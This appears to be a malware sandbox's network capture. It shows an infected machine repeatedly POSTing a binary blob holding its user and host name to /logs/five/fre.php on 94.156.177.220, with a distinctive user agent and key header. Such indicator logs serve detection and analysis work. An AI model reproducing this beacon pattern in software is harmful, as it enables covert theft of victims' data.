                                                                                    Oct 24, 2024 08:47:17.547051907 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:18.474733114 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    65192.168.2.224923894.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:18.622531891 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:18.627836943 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:19.574054003 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:19 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    66192.168.2.224923994.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:19.749378920 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:19.754722118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:20.702048063 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    67192.168.2.224924094.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:20.846249104 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:20.851687908 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:21.798337936 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:21 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    68192.168.2.224924194.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:22.009874105 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:22.015331984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:22.963869095 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    69192.168.2.224924294.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:23.112205982 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:23.119040012 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:24.081892967 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    70192.168.2.224924394.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:24.241831064 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:24.247330904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:25.191000938 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    71192.168.2.224924494.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:25.342227936 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:25.347820044 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:26.304109097 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    72192.168.2.224924594.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:26.449470043 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:26.454873085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:27.421446085 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    73192.168.2.224924694.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:27.634330988 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:27.639729023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:28.598006010 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    74192.168.2.224924794.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:28.737452030 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:28.744434118 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:29.691955090 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    75192.168.2.224924894.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:29.991545916 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:29.996928930 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:30.943694115 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    76192.168.2.224924994.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:31.147773981 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:31.153127909 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:32.217112064 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    77192.168.2.224925094.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:32.359581947 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:32.364980936 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:33.316694975 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    78192.168.2.224925194.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:33.519674063 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:33.527793884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:34.466624022 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    79192.168.2.224925294.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:34.607471943 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:34.612891912 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:36.171612978 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.
                                                                                    Oct 24, 2024 08:47:36.172389030 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    80192.168.2.224925394.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:36.380880117 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:36.386308908 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:37.350135088 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    81192.168.2.224925494.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:37.493232012 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:47:37.498723984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:47:38.480947018 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:47:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    82192.168.2.224925594.156.177.22080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:47:38.639719963 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
